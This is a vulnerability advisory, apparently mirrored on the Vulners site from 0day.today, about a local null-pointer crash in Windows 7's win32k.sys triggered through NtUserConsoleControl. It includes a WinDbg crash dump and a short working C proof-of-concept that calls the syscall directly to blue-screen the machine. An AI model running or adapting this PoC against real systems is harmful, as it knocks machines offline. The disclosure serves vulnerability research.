Vulners
Lucene search
Microsoft Windows Kernel (win32k.sys) Local Denial Of Service Vulnerability
It is possible to trigger a BSOD caused by a Null pointer deference when
calling the system call NtUserConsoleControl with the following arguments:
- NtUserControlConsole(1,0,8).
- NtUserControlConsole(4,0,8).
- NtUserControlConsole(6,0,12).
- NtUserControlConsole(2,0,12).
- NtUserControlConsole(3,0,20).
- NtUserControlConsole(5,0,8).
Different crashes are reproduced for each case. For the second case the
crash is showed below:
*EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace
referencia a la memoria en 0x%08lx. La memoria no se pudo %s.FAULTING_IP:
win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]TRAP_FRAME: 8c747b2c
-- (.trap 0xffffffff8c747b2c)ErrCode = 00000000eax=00000000 ebx=00000000
ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003eip=93310641
esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nccs=0008
ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010292win32k!xxxSetConsoleCaretInfo+*
*0xc:93310641 8b0e mov ecx,dword ptr [esi]
ds:0023:00000000=????????Resetting default scopeCUSTOMER_CRASH_COUNT:
1DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULTBUGCHECK_STR: 0x8EPROCESS_NAME:
Win32k-fuzzer_CURRENT_IRQL: 0LAST_CONTROL_TRANSFER: from 9330fc27 to
93310641STACK_TEXT: 8c747bb0 9330fc27 00000000 00000003 00000014
win32k!xxxSetConsoleCaretInfo+*
*0xc8c747bcc 9330fa8d 00000003 00000000 00000014
win32k!xxxConsoleControl+0x1478c747c20 82848b8e 00000003 00000000 00000014
win32k!NtUserConsoleControl+*
*0xc58c747c20 012e6766 00000003 00000000 00000014
nt!KiSystemServicePostCallWARNING: Frame IP not in any known module.
Following frames may be wrong.0016f204 00000000 00000000 00000000 00000000
0x12e6766STACK_COMMAND: kbFOLLOWUP_IP: win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]SYMBOL_STACK_INDEX:
0SYMBOL_NAME: win32k!xxxSetConsoleCaretInfo+*
*cFOLLOWUP_NAME: MachineOwnerMODULE_NAME: win32kIMAGE_NAME:
win32k.sysDEBUG_FLR_IMAGE_TIMESTAMP: 5accdebcFAILURE_BUCKET_ID:
0x8E_win32k!*
*xxxSetConsoleCaretInfo+cBUCKET_ID: 0x8E_win32k!*
*xxxSetConsoleCaretInfo+cFollowup: MachineOwner---------kd> r
esiesi=00000000*
*PoC code:*
*#include <Windows.h>*
*extern "C"*
*ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {*
* __asm{mov eax, ApiNumber};*
* __asm{lea edx, ApiNumber + 4};*
* __asm{int 0x2e};*
*}*
*int _tmain(int argc, _TCHAR* argv[])*
*{*
* int st = 0;*
* int syscall_ID = 0x1160; //NtUserControlConsole Windows 7*
*LoadLibrary(L"user32.dll");*
* st = (int)SystemCall32(syscall_ID, 4, 0, 8);*
* return 0;*
*}*
The vulnerability has only been tested in Windows 7 x86.
CVSS Base Score: 5.5
As the vulnerability not meet the bar that Microsoft has for servicing, not
patch will be released.
Best regards,
Victor Portal
# 0day.today [2018-07-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2018 00:00Current
7High risk
Vulners AI Score7